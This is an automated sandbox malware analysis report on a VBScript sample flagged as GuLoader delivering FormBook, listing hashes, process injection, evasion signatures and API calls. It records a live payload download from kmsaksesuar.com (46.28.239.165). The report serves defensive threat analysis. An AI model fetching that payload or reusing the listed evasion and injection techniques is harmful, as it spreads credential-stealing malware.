Edit tour

Windows Analysis Report
Scan_20241030.vbs

Overview

General Information

Sample name:	Scan_20241030.vbs
Analysis ID:	1545146
MD5:	52585e0274d1bc59e4213fcccc6baac1
SHA1:	621dd580660931e40378627578028cc8f3c787e3
SHA256:	7ca53cc839a436c88b58f7472c6b117e92a84269481b56b720b580d6ffaaa0c5
Tags:	vbsuser-abuse_ch
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Benign windows process drops PE files

VBScript performs obfuscated calls to suspicious functions

Yara detected FormBook

Yara detected GuLoader

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Potential evasive VBS script found (sleep loop)

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7136 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_20241030.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

temp_file_rhjRS.exe (PID: 5616 cmdline: "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" MD5: BC4F5F5E028CFD0EFEC5D07EF47C15D7)

temp_file_rhjRS.exe (PID: 5360 cmdline: "C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" MD5: BC4F5F5E028CFD0EFEC5D07EF47C15D7)

IKcKppyYrG.exe (PID: 4144 cmdline: "C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

verclsid.exe (PID: 1864 cmdline: "C:\Windows\SysWOW64\verclsid.exe" MD5: 190A347DF06F8486F193ADA0E90B49C5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.3341143444.00000000030B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3341888509.0000000004E80000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3335643246.00000000351A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3342290692.0000000004640000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3341485549.0000000003360000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3336400994.0000000037600000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2739235138.00000000038CF000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_20241030.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_20241030.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_20241030.vbs", ProcessId: 7136, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_20241030.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_20241030.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_20241030.vbs", ProcessId: 7136, ProcessName: wscript.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T07:34:12.151928+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49976	46.28.239.165	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

Avira: detection malicious, Label: HEUR/AGEN.1337950

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.3341143444.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3341888509.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3335643246.00000000351A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3342290692.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3341485549.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3336400994.0000000037600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 46.28.239.165:443 -> 192.168.2.5:49976 version: TLS 1.2

Source:

Binary string: wntdll.pdb source: temp_file_rhjRS.exe, verclsid.exe

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 2_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		2_2_0040596D
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 2_2_004065A2 FindFirstFileW,FindClose,		2_2_004065A2

Source: C:\Windows\SysWOW64\verclsid.exe

Code function: 4x nop then xor eax, eax

7_2_030B9DF0

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49976 -> 46.28.239.165:443

Source: global traffic

HTTP traffic detected: GET /CXvhXkzFIbqDQGDXBmPisHdik126.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kmsaksesuar.comCache-Control: no-cache

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: kmsaksesuar.com

Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976

Source: unknown

HTTPS traffic detected: 46.28.239.165:443 -> 192.168.2.5:49976 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.3341143444.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3341888509.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3335643246.00000000351A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3342290692.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3341485549.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3336400994.0000000037600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355235C0 NtCreateMutant,LdrInitializeThunk,	5_2_355235C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_35522DF0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_35522C70
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35524650 NtSuspendThread,	5_2_35524650
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35523010 NtOpenDirectoryObject,	5_2_35523010
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35523090 NtSetValueKey,	5_2_35523090
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35524340 NtSetContextThread,	5_2_35524340
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35523D70 NtOpenThread,	5_2_35523D70
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35523D10 NtOpenProcessToken,	5_2_35523D10
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522D10 NtMapViewOfSection,	5_2_35522D10
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522D00 NtSetInformationFile,	5_2_35522D00
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522D30 NtUnmapViewOfSection,	5_2_35522D30
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522DD0 NtDelayExecution,	5_2_35522DD0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522DB0 NtEnumerateKey,	5_2_35522DB0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522C60 NtCreateKey,	5_2_35522C60
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522C00 NtQueryInformationProcess,	5_2_35522C00
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522CC0 NtQueryVirtualMemory,	5_2_35522CC0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522CF0 NtOpenProcess,	5_2_35522CF0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522CA0 NtQueryInformationToken,	5_2_35522CA0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522F60 NtCreateProcessEx,	5_2_35522F60
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522F30 NtCreateSection,	5_2_35522F30
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522FE0 NtCreateFile,	5_2_35522FE0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522F90 NtProtectVirtualMemory,	5_2_35522F90
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522FB0 NtResumeThread,	5_2_35522FB0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522FA0 NtQuerySection,	5_2_35522FA0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522E30 NtWriteVirtualMemory,	5_2_35522E30
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522EE0 NtQueueApcThread,	5_2_35522EE0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522E80 NtReadVirtualMemory,	5_2_35522E80
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522EA0 NtAdjustPrivilegesToken,	5_2_35522EA0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355239B0 NtGetContextThread,	5_2_355239B0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522B60 NtClose,	5_2_35522B60
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522BF0 NtAllocateVirtualMemory,	5_2_35522BF0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522BE0 NtQueryValueKey,	5_2_35522BE0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522B80 NtQueryInformationFile,	5_2_35522B80
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522BA0 NtEnumerateValueKey,	5_2_35522BA0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522AD0 NtReadFile,	5_2_35522AD0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522AF0 NtWriteFile,	5_2_35522AF0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35522AB0 NtWaitForSingleObject,	5_2_35522AB0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051935C0 NtCreateMutant,LdrInitializeThunk,	7_2_051935C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_05192D10
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192DD0 NtDelayExecution,LdrInitializeThunk,	7_2_05192DD0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_05192DF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_05192C70
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192C60 NtCreateKey,LdrInitializeThunk,	7_2_05192C60
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_05192CA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192F30 NtCreateSection,LdrInitializeThunk,	7_2_05192F30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192FE0 NtCreateFile,LdrInitializeThunk,	7_2_05192FE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_05192E80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192B60 NtClose,LdrInitializeThunk,	7_2_05192B60
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_05192BF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_05192BE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192AD0 NtReadFile,LdrInitializeThunk,	7_2_05192AD0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05194650 NtSuspendThread,	7_2_05194650
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05193010 NtOpenDirectoryObject,	7_2_05193010
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05193090 NtSetValueKey,	7_2_05193090
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05194340 NtSetContextThread,	7_2_05194340
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05193D10 NtOpenProcessToken,	7_2_05193D10
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192D00 NtSetInformationFile,	7_2_05192D00
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192D30 NtUnmapViewOfSection,	7_2_05192D30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05193D70 NtOpenThread,	7_2_05193D70
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192DB0 NtEnumerateKey,	7_2_05192DB0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192C00 NtQueryInformationProcess,	7_2_05192C00
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192CC0 NtQueryVirtualMemory,	7_2_05192CC0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192CF0 NtOpenProcess,	7_2_05192CF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192F60 NtCreateProcessEx,	7_2_05192F60
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192F90 NtProtectVirtualMemory,	7_2_05192F90
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192FB0 NtResumeThread,	7_2_05192FB0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192FA0 NtQuerySection,	7_2_05192FA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192E30 NtWriteVirtualMemory,	7_2_05192E30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192EA0 NtAdjustPrivilegesToken,	7_2_05192EA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192EE0 NtQueueApcThread,	7_2_05192EE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_051939B0 NtGetContextThread,	7_2_051939B0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192B80 NtQueryInformationFile,	7_2_05192B80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192BA0 NtEnumerateValueKey,	7_2_05192BA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192AB0 NtWaitForSingleObject,	7_2_05192AB0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_05192AF0 NtWriteFile,	7_2_05192AF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030D93F0 NtAllocateVirtualMemory,	7_2_030D93F0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030D9290 NtClose,	7_2_030D9290
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030D90F0 NtReadFile,	7_2_030D90F0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_030D8F80 NtCreateFile,	7_2_030D8F80

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

Code function: 2_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

2_2_00403350

Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A7571	5_2_355A7571
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F0535	5_2_354F0535
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B0591	5_2_355B0591
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558D5B0	5_2_3558D5B0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A2446	5_2_355A2446
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E1460	5_2_354E1460
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355AF43F	5_2_355AF43F
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3559E4F6	5_2_3559E4F6
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35514750	5_2_35514750
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F0770	5_2_354F0770
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354EC7C0	5_2_354EC7C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355AF7B0	5_2_355AF7B0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A16CC	5_2_355A16CC
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550C6E0	5_2_3550C6E0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355BB16B	5_2_355BB16B
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3552516C	5_2_3552516C
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558A118	5_2_3558A118
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E0100	5_2_354E0100
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A81CC	5_2_355A81CC
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B01AA	5_2_355B01AA
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354FB1B0	5_2_354FB1B0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3559F0CC	5_2_3559F0CC
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A70E9	5_2_355A70E9
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355AF0E0	5_2_355AF0E0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DD34C	5_2_354DD34C
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355AA352	5_2_355AA352
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A132D	5_2_355A132D
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B03E6	5_2_355B03E6
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354FE3F0	5_2_354FE3F0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3553739A	5_2_3553739A
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35590274	5_2_35590274
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550B2C0	5_2_3550B2C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355912ED	5_2_355912ED
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F52A0	5_2_354F52A0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A1D5A	5_2_355A1D5A
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F3D40	5_2_354F3D40
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A7D73	5_2_355A7D73
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354FAD00	5_2_354FAD00
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550FDC0	5_2_3550FDC0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354EADE0	5_2_354EADE0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35508DBF	5_2_35508DBF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F0C00	5_2_354F0C00
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35569C32	5_2_35569C32
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355AFCF2	5_2_355AFCF2
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E0CF2	5_2_354E0CF2
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35590CB5	5_2_35590CB5
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35564F40	5_2_35564F40
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355AFF09	5_2_355AFF09
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35510F30	5_2_35510F30
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35532F28	5_2_35532F28
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E2FC8	5_2_354E2FC8
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354FCFE0	5_2_354FCFE0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F1F92	5_2_354F1F92
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355AFFB1	5_2_355AFFB1
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F0E59	5_2_354F0E59
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355AEE26	5_2_355AEE26
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355AEEDB	5_2_355AEEDB
